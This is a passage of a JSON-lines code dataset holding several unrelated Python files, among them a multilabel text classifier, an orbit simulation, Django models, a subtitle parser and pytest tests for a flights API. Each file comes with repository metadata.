OneVsRestClassifier(LogisticRegression(C =1, penalty='l1', class_weight='balanced'))\n#\n# # Create regularization penalty space\n# # Create regularization hyperparameter space\n#\n# parameters = {\n# \"estimator__C\": [0.1, 1, 10, 100],\n# \"estimator__penalty\": [\"l1\", \"l2\"],\n# \"estimator__class_weight\": [None,'balanced'],\n# }\n#\n# clf = GridSearchCV(model_to_set, param_grid=parameters,scoring='f1_weighted', verbose=4, n_jobs=-1)\n#\n# clf.fit(X_train, y_train)\n#\n# return clf #, scaler\n\n\n\n\ndef train_classifier(X_train, y_train):\n \"\"\"\n X_train, y_train — training data\n\n return: trained classifier\n \"\"\"\n # scaler = StandardScaler(with_mean=False)\n # scaler.fit(X_train)\n\n # Create and fit LogisticRegression wrapped into OneVsRestClassifier.\n clf = OneVsRestClassifier(LogisticRegression(C=1, class_weight=None, penalty='l1'))\n clf.fit(X_train, y_train)\n\n return clf #, scaler\n\n\n\nclassifier_mybag = train_classifier(X_train_mybag, y_train)\nclassifier_tfidf = train_classifier(X_train_tfidf, y_train)\n\ny_val_predicted_labels_mybag = 
classifier_mybag.predict(X_val_mybag)\ny_val_predicted_scores_mybag = classifier_mybag.decision_function(X_val_mybag)\n\ny_val_predicted_labels_tfidf = classifier_tfidf.predict(X_val_tfidf)\ny_val_predicted_scores_tfidf = classifier_tfidf.decision_function(X_val_tfidf)\n\n\ny_val_pred_inversed = mlb.inverse_transform(y_val_predicted_labels_tfidf)\ny_val_inversed = mlb.inverse_transform(y_val)\nfor i in range(3):\n print('Title:\\t{}\\nTrue labels:\\t{}\\nPredicted labels:\\t{}\\n\\n'.format(\n X_val[i],\n ','.join(y_val_inversed[i]),\n ','.join(y_val_pred_inversed[i])\n ))\n\n\n\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\n\n\ndef print_evaluation_scores(y_val, predicted):\n print(f1_score(y_val, predicted, average=\"weighted\"))\n print(precision_score(y_val, predicted, average=\"weighted\"))\n print(recall_score(y_val, predicted, average=\"weighted\"))\n print(accuracy_score(y_val, predicted))\n\n\nprint('Bag-of-words')\nprint_evaluation_scores(y_val, y_val_predicted_labels_mybag)\nprint('Tfidf')\nprint_evaluation_scores(y_val, y_val_predicted_labels_tfidf)\n\n\n\ntest_predictions = classifier_tfidf.predict(X_test_tfidf)\ntest_pred_inversed = mlb.inverse_transform(test_predictions)\n\n\ndef print_words_for_tag(classifier, tag, tags_classes, index_to_words, all_words):\n \"\"\"\n classifier: trained classifier\n tag: particular tag\n tags_classes: a list of classes names from MultiLabelBinarizer\n index_to_words: index_to_words transformation\n all_words: all words in the dictionary\n\n return nothing, just print top 5 positive and top 5 negative words for current tag\n \"\"\"\n print('Tag:\\t{}'.format(tag))\n\n # Extract an estimator from the classifier for the given tag.\n index_of_tag = tags_classes.index(tag)\n estimators_of_tag = classifier.coef_[index_of_tag]\n # Extract feature coefficients from the estimator.\n ind_of_estimators = np.argsort([estimators_of_tag])\n # Extract feature coefficients from the estimator.\n\n # top_positive_coefs = estimators_of_tag[ind_of_estimators][:,-5:]# top-5 words sorted by the coefficients.\n # top_negative_coefs = estimators_of_tag[ind_of_estimators][0,:5]\n\n top_positive_words = [index_to_words.get(key) for key in ind_of_estimators[:,-5:].tolist()[0]][::-1]\n top_negative_words = [index_to_words.get(key) for key in ind_of_estimators[0,:5].tolist()]\n\n # bottom-5 words sorted by the coefficients.\n print('Top positive words:\\t{}'.format(', '.join(top_positive_words)))\n print('Top negative words:\\t{}\\n'.format(', '.join(top_negative_words)))\n\n\nprint_words_for_tag(classifier_tfidf, 'c', mlb.classes, tfidf_reversed_vocab, ALL_WORDS)\nprint_words_for_tag(classifier_tfidf, 'c++', mlb.classes, tfidf_reversed_vocab, ALL_WORDS)\nprint_words_for_tag(classifier_tfidf, 'linux', mlb.classes, tfidf_reversed_vocab, ALL_WORDS)", "repo_name": "tsantosh7/NLP_multilabel_classification_hse-aml", "sub_path": "multilabel_classification.py", "file_name": "multilabel_classification.py", "file_ext": "py", "file_size_in_byte": 10176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "nltk.download", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 23, "usage_type": "argument"}, {"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 35, "usage_type": 
"call"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 37, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 37, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 64, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 69, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 116, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 116, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 116, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 117, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 117, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 117, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 118, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 118, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 118, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MultiLabelBinarizer", "line_number": 155, "usage_type": "call"}, {"api_name": "sklearn.multiclass.OneVsRestClassifier", "line_number": 217, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 217, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 249, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 251, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 282, "usage_type": "call"}]}
+{"seq_id": "17313090841", "text": "'''\ndate: 08/01/22\nexercise: 8.13\n\ndesc: solving and visualizing earth's and pluto's orbits about the sun \nusing the bulirsch-stoer method with combined modified midpoint/richardson extrapolation \n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import sqrt\n\nG,M = 6.6738e-11*(3600*24*7*52)**2, 1.9891e30\nN = 52 \ndelta = 1.0*10e3\n\ndw = lambda r: -G*M*r[0]/sqrt(r[0]**2 + r[1]**2)**3\ndz = lambda r: -G*M*r[1]/sqrt(r[0]**2 + r[1]**2)**3\nf = lambda r: np.array( [r[2],r[3],dw(r),dz(r)] ) \n\n\ndef bs():\n for t in range(N-1):\n\n n = 1\n r1 = r[:,t] + 0.5*H*f(r[:,t])\n r2 = r[:,t] + H*f(r1)\n R1 = np.empty((4,1),float)\n R1[:,0] = 0.5*(r1+r2+0.5*H*f(r2))\n error = 2*H*delta\n while error>H*delta:\n n = n + 1\n h = H/n\n \n r1 = r[:,t] + 0.5*h*f(r[:,t])\n r2 = r[:,t] + h*f(r1)\n for i in range(n-1):\n r1 += h*f(r2)\n r2 += h*f(r1)\n\n R2 = R1[:,:]\n R1 = np.empty((4,n),float)\n R1[:,0] = 0.5*(r1+r2+0.5*h*f(r2))\n for m in range(1,n):\n ep = (R1[:,m-1]-R2[:,m-1])/((n/(n-1))**(2*m)-1)\n R1[:,m] = R1[:,m-1] + ep\n error = abs(np.linalg.norm(ep[0:1]))\n #print(error)\n r[:,t+1] = R1[:,n-1]\n return r\n\nr = np.empty((4,N),float)\nt0,tf = 0.0,1.1 # earth times\nH = (tf-t0)/N\nt_points = np.arange(t0,tf,H)\nr[:,0] = [1.471e11,0,0,3.0287e4*(3600*24*7*52)] # earth initial conditions\nearth_r = bs()\n\nt0,tf = 0.0,260 # pluto times\nH = (tf-t0)/N\nt_points = np.arange(t0,tf,H)\nr = np.empty((4,N),float)\nr[:,0] = [4.4368e12,0,0,6.1218e3*(3600*24*7*52)] # pluto initial conditions \npluto_r = bs()\n\nfig,ax = plt.subplots(1)\nax.plot(earth_r[0,:],earth_r[1,:],c='blue')\nax.plot(pluto_r[0,:],pluto_r[1,:],c='orange')\nax.set(xlabel='x distance from sun',ylabel='y distance from sun',title=\"earth and pluto's orbit about the sun\")\nplt.show()", "repo_name": "jonathanhouse/selected-physics-projects", "sub_path": "visualizations/bs_method_orbit/ex813.py", "file_name": "ex813.py", "file_ext": "py", "file_size_in_byte": 1967, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "math.sqrt", "line_number": 17, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}]}
+{"seq_id": "5671664008", "text": "from datetime import datetime, timedelta\nimport math,random\nfrom flask_login import UserMixin\nfrom spotswap import db\n\n\nclass Availability(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n parking_id = db.Column(db.Integer, db.ForeignKey('parkings.id'), nullable=False)\n date = db.Column(db.Date, nullable=False)\n start_time = db.Column(db.Time, nullable=False)\n end_time = db.Column(db.Time, nullable=False)\n is_available = db.Column(db.Boolean, default=True, nullable=False)\n created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)\n updated_at = db.Column(db.DateTime, onupdate=datetime.utcnow)\n\n def __str__(self):\n return 'Availability: {}'.format(self.id)\n", "repo_name": "AarinSalot/SpotSwap", "sub_path": "backend/spotswap/models/Availability.py", "file_name": "Availability.py", "file_ext": "py", "file_size_in_byte": 724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "spotswap.db.Model", "line_number": 7, "usage_type": "attribute"}, {"api_name": "spotswap.db", "line_number": 7, "usage_type": "name"}, {"api_name": "spotswap.db.Column", "line_number": 8, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 8, "usage_type": "name"}, {"api_name": "spotswap.db.Integer", "line_number": 8, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 9, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 9, "usage_type": "name"}, {"api_name": "spotswap.db.Integer", "line_number": 9, "usage_type": "attribute"}, {"api_name": "spotswap.db.ForeignKey", "line_number": 9, "usage_type": "call"}, {"api_name": "spotswap.db.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 10, "usage_type": "name"}, {"api_name": "spotswap.db.Date", "line_number": 10, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 11, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 11, "usage_type": "name"}, {"api_name": "spotswap.db.Time", "line_number": 11, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 12, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 12, "usage_type": "name"}, {"api_name": "spotswap.db.Time", "line_number": 12, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 13, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 13, "usage_type": "name"}, {"api_name": "spotswap.db.Boolean", "line_number": 13, "usage_type": "attribute"}, {"api_name": "spotswap.db.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 14, "usage_type": "name"}, {"api_name": "spotswap.db.DateTime", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "name"}, {"api_name": "spotswap.db.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "spotswap.db", "line_number": 15, "usage_type": "name"}, {"api_name": "spotswap.db.DateTime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 15, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "73743978008", "text": "import sys\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom .base_model import BaseModel\n\nsys.path.append('..')\n\nfrom utils.opencvhelper import SiftWrapper\n\n\nclass RootsiftModel(BaseModel):\n default_config = {'n_feature': 0, \"n_sample\": 0,\n 'batch_size': 512, 'sift_wrapper': None, 'upright': False, 'scale_diff': False,\n 'dense_desc': False, 'sift_desc': False, 'peak_thld': 0.0067, 'max_dim': 1280}\n\n def _init_model(self):\n self.sift_wrapper = SiftWrapper(\n n_feature=self.config['n_feature'],\n n_sample=self.config['n_sample'],\n peak_thld=self.config['peak_thld'])\n self.sift_wrapper.standardize = False # the network has handled this step.\n self.sift_wrapper.ori_off = self.config['upright']\n self.sift_wrapper.pyr_off = not self.config['scale_diff']\n self.sift_wrapper.create()\n\n def _run(self, data):\n assert data.shape[-1] == 1\n gray_img = np.squeeze(data, axis=-1).astype(np.uint8)\n # detect SIFT keypoints.\n npy_kpts, cv_kpts = self.sift_wrapper.detect(gray_img)\n sift_desc = self.sift_wrapper.compute(gray_img, cv_kpts)\n return npy_kpts, sift_desc\n\n def _construct_network(self):\n \"\"\"Model for patch description.\"\"\"\n return", "repo_name": "lzx551402/contextdesc", "sub_path": "models/rootsift_model.py", "file_name": "rootsift_model.py", "file_ext": "py", "file_size_in_byte": 1314, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 224, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "base_model.BaseModel", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.opencvhelper.SiftWrapper", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 30, "usage_type": "attribute"}]}
+{"seq_id": "36137584497", "text": "import xml.etree.ElementTree as ET\r\n\r\n\r\ndef parse_time(str_ms):\r\n total_ms = int(str_ms)\r\n ms = total_ms % 1000\r\n total_s = int(total_ms / 1000)\r\n s = total_s % 60\r\n total_m = int(total_s / 60)\r\n m = total_m % 60\r\n h = int(total_m / 60)\r\n\r\n # print(str_ms, ' to:', h, m, s, ms)\r\n return total_ms, h, m, s, ms\r\n\r\n\r\ndef parse_end_time(str_ms_start, str_ms_duration):\r\n return parse_time(int(str_ms_start) + int(str_ms_duration))\r\n\r\n\r\nclass VttLine:\r\n def __init__(self, start, stop, text):\r\n self.start = start\r\n self.end = stop\r\n self.text = text.strip()\r\n\r\n def __str__(self):\r\n return '%s %s %s' % (self.start, self.end, self.text)\r\n\r\n\r\ndef parse_subtitle_xml(filename):\r\n tree = ET.parse(filename)\r\n root = tree.getroot()\r\n\r\n count = 0\r\n # last_start_ms = 0\r\n last_end_time = [-1, 0, 0, 0, 0]\r\n all_lines = []\r\n for p in root.findall('body/p'):\r\n # skip 0 duration\r\n if 'd' not in p.attrib:\r\n continue\r\n\r\n text = ''\r\n for s in p.findall('s'):\r\n text += s.text\r\n\r\n # skip empty sentences\r\n text = text.strip()\r\n if len(text) == 0 or text == '[Music]':\r\n continue\r\n\r\n # parse timing\r\n start_time = parse_time(p.attrib['t'])\r\n end_time = parse_end_time(p.attrib['t'], p.attrib['d'])\r\n\r\n # print(start_time, end_time, text)\r\n # update last record if it's part of previous sentence\r\n if start_time[0] <= last_end_time[0]:\r\n all_lines[-1]['end_time'] = start_time\r\n\r\n # record another session with empty subtitle if span > 10ms, for segmenting\r\n if start_time[0] - last_end_time[0] > 10:\r\n all_lines.append({'line_id': count, 'start_time': last_end_time, 'end_time': start_time, 'text': ''})\r\n count += 1\r\n\r\n all_lines.append({'line_id': count, 'start_time': start_time, 'end_time': end_time, 'text': text})\r\n\r\n # last_start_ms = start_time[0]\r\n last_end_time = end_time\r\n\r\n # add line id\r\n count += 1\r\n\r\n output = []\r\n for line in all_lines:\r\n # output.append('%02d:%02d:%02d.%03d %02d:%02d:%02d.%03d %s\\n' %\r\n # (line['start_time'][1], line['start_time'][2], line['start_time'][3], line['start_time'][4],\r\n # line['end_time'][1], line['end_time'][2], line['end_time'][3], line['end_time'][4],\r\n # line['text']))\r\n\r\n start_time_str = '%02d:%02d:%02d.%03d' % (line['start_time'][1], line['start_time'][2], line['start_time'][3], line['start_time'][4])\r\n stop_time_str = '%02d:%02d:%02d.%03d' % (line['end_time'][1], line['end_time'][2], line['end_time'][3], line['end_time'][4])\r\n output.append(VttLine(start_time_str, stop_time_str, line['text']))\r\n\r\n return output\r\n\r\nif __name__ == '__main__':\r\n lines = parse_subtitle_xml('./Subtitles/EP1.pretty.xml')\r\n\r\n out_file = './EP1.vtt.txt'\r\n f = open(out_file, 'w+')\r\n for line in lines:\r\n f.write(str(line))\r\n f.write('\\n')\r\n f.close()\r\n", "repo_name": "Xiaoxuan-Zhang/Videogame_Moment_Textual_Search", "sub_path": "subtitlexmlparser.py", "file_name": "subtitlexmlparser.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 32, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "13476540126", "text": "# __author__ = 'veronika'\n\nimport pickle\nimport vcf\nfrom Bio.SeqRecord import SeqRecord\n\nfrom django.db import models\nfrom sequencing.analysis.snps.parse_snps import retrieve_explicit_snps_positions, snp_is_ms\nfrom targeted_enrichment.amplicons.models import Amplicon, AmpliconCollection, PlainTargetedAmplicon\nfrom sequencing.analysis.models_common import SampleReads, _read_bam, post_delete_files, BWAIndexMixin\n\n\ndef is_snp(r, min_cover=5):\n if r.INFO['DP'] < min_cover or len(r.REF) != 1:\n return False\n # if len(r.ALT) == 1:\n # return False\n return True\n\n\ndef _parse_vcf_file(vcf_file, min_cover=5):\n cell_snps = {}\n chrom = None\n is_ms = False\n snp_rel_pos = []\n\n vcf_reader = vcf.Reader(open(vcf_file, 'r'))\n for r in vcf_reader:\n if is_snp(r, min_cover):\n if chrom != r.CHROM:\n chrom = r.CHROM\n snp_rel_pos = list(retrieve_explicit_snps_positions(r))\n is_ms = snp_is_ms(r)\n if is_ms:\n continue\n smp_mod = r.ALT\n if len(r.ALT) == 1:\n smp_mod = SeqRecord('X')\n cell_snps.setdefault((r.CHROM, str(r.POS)), {'base': r.REF,\n 'modification': smp_mod,\n 'DP': r.INFO['DP'],\n 'stats': r.INFO['QS'],\n 'SNP_defined': False})\n\n for snp_rel in snp_rel_pos:\n if r.POS == snp_rel:\n cell_snps[(r.CHROM, str(r.POS))]['SNP_defined'] = True\n # Note that vcf is 1-based, so we should have abs_pos-amplicon_start+1 as rel_pos.\n # However, because bedtools is 0-based, our amplicons are without the first base,\n # so vcf indices become 0-based in the original amplicon, and rel_pos = abs_pos-amplicon_start.\n return cell_snps\n\n\ndef _extract_snp_file(snp_file):\n with open(snp_file, 'rb') as handle:\n snp_dict = pickle.load(handle)\n return snp_dict\n\n\nclass AmpliconCollectionBWAIndex(BWAIndexMixin):\n amplicon_collection = models.ForeignKey(AmpliconCollection, unique=True)\n\n def __str__(self):\n return \"{}\".format(self.amplicon_collection)\n\npost_delete_files(AmpliconCollectionBWAIndex)\n\n\nclass ReadsAlignment(models.Model):\n sample_read = models.ForeignKey(SampleReads)\n alignment_reference = models.ForeignKey(AmpliconCollectionBWAIndex)\n bam_file = models.FilePathField(max_length=200, allow_files=True, allow_folders=False)\n\n def parse_bam_file(self):\n for ms_genotypes_name, read_id in _read_bam(self.bam_file):\n yield read_id, ms_genotypes_name\n\n @property\n def files(self):\n yield self.bam_file\n\n def __str__(self):\n return \"{}@{}\".format(self.sample_read, self.alignment_reference)\n\n class Meta:\n unique_together = (\n (\"sample_read\", \"alignment_reference\"),\n )\npost_delete_files(ReadsAlignment)\n\n\nclass VCFReads(models.Model):\n reads_alignment = models.ForeignKey(ReadsAlignment, unique=True)\n vcf_file = models.FilePathField(max_length=200, allow_files=True, allow_folders=False)\n\n def parse_vcf_file(self):\n rows = _parse_vcf_file(self.vcf_file)\n return rows\n\n @property\n def files(self):\n yield self.vcf_file\n\n def __str__(self):\n return \"{}@{}\".format(self.reads_alignment, self.vcf_file)\n\npost_delete_files(VCFReads)\n\n\nclass SNPReads(models.Model):\n vcf_read = models.ForeignKey(VCFReads)\n min_cover = models.IntegerField()\n snps_dict = models.FilePathField(max_length=200, allow_files=True, allow_folders=False)\n\n def extract_snp_file(self):\n snp_dict = _extract_snp_file(self.snps_dict)\n return snp_dict\n\n @property\n def files(self):\n yield self.snps_dict\n\n def __str__(self):\n return \"{}@{}\".format(self.vcf_read, self.snps_dict)\n\n class Meta:\n unique_together = (\n 
(\"vcf_read\", \"min_cover\"),\n )\npost_delete_files(SNPReads)\n", "repo_name": "shapirolab/clineage", "sub_path": "sequencing/analysis/snps/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 4167, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "31", "api": [{"api_name": "vcf.Reader", "line_number": 27, "usage_type": "call"}, {"api_name": "sequencing.analysis.snps.parse_snps.retrieve_explicit_snps_positions", "line_number": 32, "usage_type": "call"}, {"api_name": "sequencing.analysis.snps.parse_snps.snp_is_ms", "line_number": 33, "usage_type": "call"}, {"api_name": "Bio.SeqRecord.SeqRecord", "line_number": 38, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 56, "usage_type": "call"}, {"api_name": "sequencing.analysis.models_common.BWAIndexMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 61, "usage_type": "call"}, {"api_name": "targeted_enrichment.amplicons.models.AmpliconCollection", "line_number": 61, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 61, "usage_type": "name"}, {"api_name": "sequencing.analysis.models_common.post_delete_files", "line_number": 66, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 69, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 70, "usage_type": "call"}, {"api_name": "sequencing.analysis.models_common.SampleReads", "line_number": 70, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 70, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 71, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 71, "usage_type": "name"}, {"api_name": "django.db.models.FilePathField", "line_number": 72, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 72, "usage_type": "name"}, {"api_name": "sequencing.analysis.models_common._read_bam", "line_number": 75, "usage_type": "call"}, {"api_name": "sequencing.analysis.models_common.post_delete_files", "line_number": 89, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 92, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 93, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 93, "usage_type": "name"}, {"api_name": "django.db.models.FilePathField", "line_number": 94, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 94, "usage_type": "name"}, {"api_name": "sequencing.analysis.models_common.post_delete_files", "line_number": 107, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 110, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 110, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 111, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 111, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 112, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 112, "usage_type": "name"}, {"api_name": "django.db.models.FilePathField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 113, "usage_type": "name"}, {"api_name": 
"sequencing.analysis.models_common.post_delete_files", "line_number": 130, "usage_type": "call"}]}
+{"seq_id": "37027188929", "text": "import random\n\nimport pytest\nfrom django.shortcuts import reverse\nfrom django.utils import timezone\nfrom mimesis import Address, Datetime, Numbers\nfrom mimesis.random import Random\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\nfrom flights.platform import models\n\n\n@pytest.fixture\ndef headers(user):\n refresh = RefreshToken.for_user(user)\n return {\"HTTP_AUTHORIZATION\": f\"Bearer {refresh.access_token}\"}\n\n\n@pytest.fixture\ndef flight():\n return models.Flight.objects.create(\n name=\"Flight Name\",\n number=\"FL 1235\",\n scheduled_at=timezone.now(),\n expected_at=timezone.now(),\n departure=\"Stockholm\",\n destination=\"London\",\n duration=90,\n fare=345,\n )\n\n\n@pytest.fixture\ndef flights():\n return [\n models.Flight.objects.create(\n name=f\"Flight_{i}\",\n number=Random().custom_code(mask=\"@@ ####\"),\n departure=Address().city(),\n destination=Address().city(),\n scheduled_at=Datetime().datetime(),\n expected_at=Datetime().datetime(),\n duration=Numbers().integer_number(start=1, end=100),\n fare=Numbers().float_number(start=1, end=10000, precision=2),\n )\n for i in range(10)\n ]\n\n\ndef test_get_flights_unauth(client):\n resp = client.get(reverse(\"flight-list\"))\n assert resp.status_code == 401\n\n\ndef test_get_flights_empty(client, headers):\n resp = client.get(\n reverse(\"flight-list\"), content_type=\"application/json\", **headers\n )\n\n payload = resp.json()\n assert payload[\"results\"] == []\n\n\ndef test_get_flights_ok(client, headers, flight):\n resp = client.get(\n reverse(\"flight-list\"), content_type=\"application/json\", **headers\n )\n\n payload = resp.json()\n assert payload[\"results\"][0][\"name\"] == flight.name\n assert payload[\"results\"][0][\"number\"] == flight.number\n\n\ndef test_create_flight(client, headers):\n flight_name = \"Flight1\"\n data = {\n \"name\": flight_name,\n \"number\": \"Flight Number\",\n \"departure\": \"Stockholm\",\n \"destination\": \"London\",\n \"scheduled_at\": timezone.now(),\n \"expected_at\": timezone.now(),\n \"fare\": 112,\n \"duration\": 90,\n }\n resp = client.post(\n reverse(\"flight-list\"),\n data=data,\n content_type=\"application/json\",\n **headers,\n )\n\n payload = resp.json()\n created_flight = models.Flight.objects.get(name=flight_name)\n assert payload[\"id\"] == created_flight.id\n\n\ndef test_partial_update_flight(client, headers, flight):\n data = {\n \"departure\": \"Paris\",\n }\n resp = client.patch(\n reverse(\"flight-detail\", args=[flight.id]),\n data=data,\n content_type=\"application/json\",\n **headers,\n )\n\n payload = resp.json()\n updated_flight = models.Flight.objects.get(id=flight.id)\n assert payload[\"departure\"] == updated_flight.departure\n\n\ndef test_delete_flight(client, headers, flight):\n resp = client.delete(\n reverse(\"flight-detail\", args=[flight.id]),\n content_type=\"application/json\",\n **headers,\n )\n\n assert resp.status_code == 204\n assert not models.Flight.objects.filter(id=flight.id).exists()\n\n\ndef test_search_flight_by_name(client, headers, flights):\n some_flight = random.choice(flights)\n resp = client.get(\n reverse(\"flight-list\"),\n data={\"name\": some_flight.name},\n **headers,\n )\n\n assert resp.status_code == 200\n\n payload = resp.json()\n assert len(payload[\"results\"]) == 1\n assert payload[\"results\"][0][\"number\"] == some_flight.number\n\n\n@pytest.mark.django_db\n@pytest.mark.usefixtures(\"flights\")\ndef test_search_specific_flight(client, headers, flight):\n assert 
models.Flight.objects.count() == 11\n\n resp = client.get(\n reverse(\"flight-list\"),\n data={\n \"scheduled_at\": flight.scheduled_at,\n \"departure\": flight.departure,\n \"destination\": flight.destination,\n },\n **headers,\n )\n\n assert resp.status_code == 200\n\n payload = resp.json()\n assert len(payload[\"results\"]) == 1\n assert payload[\"results\"][0][\"departure\"] == flight.departure\n\n\ndef test_search_flight_pagination(client, headers, flights):\n assert models.Flight.objects.count() == 10\n\n resp = client.get(reverse(\"flight-list\"), data={\"limit\": 5}, **headers)\n\n payload = resp.json()\n assert len(payload[\"results\"]) == 5\n assert resp.status_code == 200\n", "repo_name": "pavel-fokin/flights", "sub_path": "tests/test_flights_api.py", "file_name": "test_flights_api.py", "file_ext": "py", "file_size_in_byte": 4493, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rest_framework_simplejwt.tokens.RefreshToken.for_user", "line_number": 15, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.tokens.RefreshToken", "line_number": 15, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flights.platform.models.Flight.objects.create", "line_number": 21, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 21, "usage_type": "attribute"}, 